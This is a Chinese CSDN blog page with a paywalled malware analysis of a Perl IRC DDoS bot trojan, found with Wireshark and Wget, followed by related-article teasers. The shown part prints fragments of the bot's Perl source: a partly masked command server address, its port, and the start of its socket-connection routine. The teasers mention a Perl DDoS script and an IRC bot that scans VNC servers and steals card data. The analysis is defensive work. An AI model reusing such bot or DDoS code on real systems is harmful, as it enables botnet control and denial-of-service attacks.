Wireshark Wget bot木马分析

最新推荐文章于 2024-05-15 13:16:33 发布
最新推荐文章于 2024-05-15 13:16:33 发布
阅读量1.4k 收藏
点赞数
分类专栏: 安全 文章标签: wireshark 木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZmeiXuan/article/details/78115358
版权
本文介绍了使用Wireshark对Wget爬虫木马进行分析的过程,涉及其离线下载网页的功能以及木马的启动连接、指令解析和任务执行等行为。在行为分析中,重点讨论了木马如何执行bfunc函数来响应不同指令,如结束进程等。
摘要由CSDN通过智能技术生成

爬虫和蜘蛛

  • 黑盒测试,它涉及到外部攻击者用于获取足够信息的所有步骤,以便入侵应用或服务器的特定功能。
  • 作为每个 Web 渗透测试中侦查阶段的一部分,我们需要浏览器每个包含在网页中的链接,并跟踪它展示的每个文件。
  • 有一些工具能够帮助我们自动和以及加速完成这个任务,它们叫做 Web 爬虫或蜘蛛。
  • 这些工具通过跟随所有到外部文件的链接和引用,有的时候会填充表单并将它们发送到服务器,保存所有请求和响应来浏览网页,从而提供给我们离线分析它们的机会。

1.1 使用 Wget 为离线分析下载网页

Wget 是 GNU 项目的一部分,也包含在主流 linux 发行版中,包括 Kali。它能够递归为离线浏览下载网页,包括链接转换和下载非 HTML 文件。

这里写图片描述

访问链接,发现为DDoS Perl IrcBotV1.0 版本的木马程序

这里写图片描述

木马链接

2.1行为分析

服务器基本信息

my $nick =$rircname[rand scalar @rircname];

$server = '52.187.70.**' unless $server;
my $port = '80';

my $linas_max='8';
my $sleep='5';

my $homedir = "/tmp";
my $version = 'DDoS Perl Bot v1.0';
1:启动连接
sub conectar {
   
  my $meunick = $_[0];
  my $server_con = $_[1];
  my $port_con = $_[2];
  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con",
  PeerPort=>$port_con)
最低0.47元/天 解锁文章
ChengKaoAO
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wireshark TCP状态转换+HTTP抓包分析+提取木马SNORT规则
ajcaizixi的专栏
06-20 4881
这里把TCP三次握手四次挥手+HTTP抓包分析放在一起分析。 说是HTTP,其实并不打算真的就协议层面去分析HTTP。因为那又是一个可以另外水一篇博客的例子了。 Tcp状态图+HTTP抓包分析 在TCP层,有个FLAGS字段,这个字段有以下几个标识:SYN, FIN, ACK, PSH, RST, URG. 其中, SYN表示建立连接,  FIN表示关
wireshark抓包及分析
最新发布
06-21
wireshark抓包及分析 wireshark抓包及分析 在使用WireShark之前先了解一下自己计算机的一些信息 查看自己主机的IP地址,这里用的Win11电脑,直接使用cmd输入 ipconfig 查看本机IP信息
WireShark黑客发现之旅(8)—针对路由器的Linux木马
weixin_33750452的博客
03-08 758
聚锋实验室 · 2016/04/25 10:24Author:Mr.Right、Gongmo申明:文中提到的攻击方式仅为曝光、打击恶意网络攻击行为,切勿模仿,否则后果自负。0x00 前言路由器木马,其主要目标是控制网络的核心路由设备;一旦攻击成功,其危害性远大于一台主机被控。如果仅仅在路由器上面防范该类木马,那也是不够的,有很多Linux服务器违规开放Telnet端口,且使用了弱口令,一样可以中招...
使用Wireshark解决网络故障(木马)的一个典型案例
normanhere的博客
05-15 351
使用conversation统计,可以看到明显的内网主机中木马特征:顺序产生的源端口,按照列表扫描木马客户端的目的IP,目的端口都是445,字节大小是固定的66字节,短时间的大量并发连接,但是大多数木马客户端都是不在线的。1、安全设备如果配置不当,将无法起到安全作用,形同虚设,安全设备默认外网对内网访问端口必须全部关闭,只允许必要的端口开放,并且需要做7层或者3层的ACL来限制外来ip的登录,并且做AAA部署。这是一个正常的客户请求一个图片的下载的TCP序列,可以看到,发生了很多重传导致速度极慢。
wirehark数据分析与取证flag.pcap
热门推荐
Aluxian_的博客
04-18 1万+
什么是wireshark?wiresharekflag.pcap数据包数据包下载 请私信博主 wiresharek Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是检索取网络封包,并同时显示出最详细的网络封包数据。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。 wireshark的介绍: 假设您是一名网络安全工程师,需要对某公司的公司进行数据分析分析黑客获取电脑权限进行的操作,我们本章主要以分析案例数据包进行分析关键数据。 flag.p
网络空间安全 恶意流量和恶意代码 结合Wireshark初步分析(二)
Ax的博客
09-16 1567
网络空间安全 恶意流量和恶意代码 学习入门(二)
配置本地yum仓库安装wiresharkwget
kuangfeng的博客
02-15 3476
配置本地yum仓库安装wiresharkwget
Wireshark分析协议数据包
10-11
Wireshark是一款强大的网络协议分析工具,用于捕获和显示网络封包的详细信息,它可以帮助网络管理员、开发者以及安全专家深入理解网络通信的过程。在Wireshark中,我们可以分析多种协议的数据包,包括IP、UDP、TCP、...
Wireshark数据包分析实战
02-23
本书是Wireshark数据包分析实战(第二版) 的PDF版 【美】Chris Sanders 著 诸葛建伟 陈霖 许伟林 译 人名邮电出版社 目录:1.数据包分析技术与网络基础 2.监听网络线路 3.Wireshark入门 。
wireshark数据包分析.pdf
01-25
### Wireshark 数据包分析知识点 #### Wireshark概述 Wireshark是一款极其强大的网络数据包嗅探工具,被广泛应用于网络运行管理、故障诊断、应用开发与测试、网络安全及电子取证等领域。它具备以下特点: - **丰富...
WireShark 网络流量分析抓包工具
09-06
Wireshark是一款强大的网络流量分析工具,被广泛应用于网络安全、故障排查和性能优化等领域。它以前的名字是Ethereal,由于其开源、免费且跨平台的特性,深受全球IT专业人士的喜爱。下面将详细介绍Wireshark的功能、...
DDoS脚本:用perl编写的ddos脚本,可自动检测开放和易受攻击的端口,最多提供1.5 GB的软件包
02-05
DDoS脚本:用perl编写的ddos脚本,可自动检测开放和易受攻击的端口,最多提供1.5 GB的软件包
PerlIRCSSL_VNCbypass:此代码是一个IRC BOT,可以使用SSL连接到IRC服务器。该机器人的主要目的是扫描OpenUnsecured VNC服务器。 该机器人还可以在该机器人正在运行的计算机中搜索信用卡信息(已在最新版本中删除,以优化编译过程时间)。 添加了SSH接管模块命令。还有一个用Python制造的DDoS模块,用于从网络中取出目标
02-05
PerlIRCSSL_VNCbypass:此代码是一个IRC BOT,可以使用SSL连接到IRC服务器。该机器人的主要目的是扫描OpenUnsecured VNC服务器。 该机器人还可以在该机器人正在运行的计算机中搜索信用卡信息(已在最新版本中删除,以优化编译过程时间)。 添加了SSH接管模块命令。还有一个用Python制造的DDoS模块,用于从网络中取出目标
irc-bot:基于Linux Academy框架的IRC bot
02-12
IRC-Bot 基于以下框架: : 在你开始之前 安装先决条件 apt install python-pip pip install requests 在bot目录中创建配置文件。 touch irc.json echo '{' > irc.json echo ' "server": "test3.server.com",' >> irc.json echo ' "channel": "#testchannel",' >> irc.json echo ' "botnick": "yourbotsnick",' >> irc.json echo ' "adminname": "yourircnick",' >> irc.json echo ' "exitcode": "word"' >> irc.json ech
服务器有无中木马前期诊断 注意:wget最好是从服务器上卸载掉,因为多数情况是wget下载木马到服务器的...
weixin_34060299的博客
04-22 462
# rpm -qf /usr/bin/wget wget-1.12-5.el6_6.1.x86_64 rpm -e --nodeps wget   有无下列文件: cat /etc/rc.d/init.d/selinux #!/bin/bash /usr/bin/bsd-port/getty # cat /etc/rc.d/init.d/DbSecuritySpt #!/bin/ba...
Wireshark网络分析实战——Wireshark的安装和抓包
future_dreams的博客
10-13 5174
一、Wireshark简介 本节涵盖以下内容: 安置Wireshark(主机/程序); 开始抓包; 本书的前言曾提到过网络排障以及内置于Wireshark能帮助排障的各种工具。一旦决定动用Wireshark协议分析软件,在使用之前,则有必要先确定该软件在网络中的部署(或安装)位置。除此之外,还得对该软件做一些基本的配置,至少应让其界面看起来更为友好。 用Wireshark执行基本的抓包操作,配置起来并不麻烦,但是该软件也包含了很多高级配置选项,可用来应对某些特殊情况。这样的特殊情况包括令Wireshar
Wireshark抓包解释说明
hl_java的专栏
12-06 7392
Wireshark与对应的OSI七层模型 TCP三次握手 TCP三次握手的理论知识 wireshark三次握手对应的报文情况 图中可以看到wireshark截获到了三次握手的三个数据包。第四个包才是HTTP的, 这说明HTTP的确是使用TCP建立连接的。 第一次握手数据包: 客户端发送一个TCP,标志位为SYN,序列号为0, 代表客户端请求建立连接。 如下图: 点评:报文中有2个序列号,上面截图中写着是Seq=0,表示是相对的relative sequence number,其实真实的序列号Sequ
Perl写的DDOS源码
weixin_30460489的博客
08-30 146
#!usr/bin/perl #please dont edit this without including this. use IO::Socket::INET; print "Welcome to the Hyper Text Assault Script, or HTAS v1.0b"; while (!$ARGV[0]) { &usage; #change to usage su...
Wireshark网络数据包分析入门指南
"Wireshark数据包分析" Wireshark是一款强大的网络封包分析软件,常用于网络故障排查、性能优化、安全检测以及协议开发等领域。它具有丰富的协议支持,友好的用户界面,且完全免费,适用于多种操作系统,如Windows...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值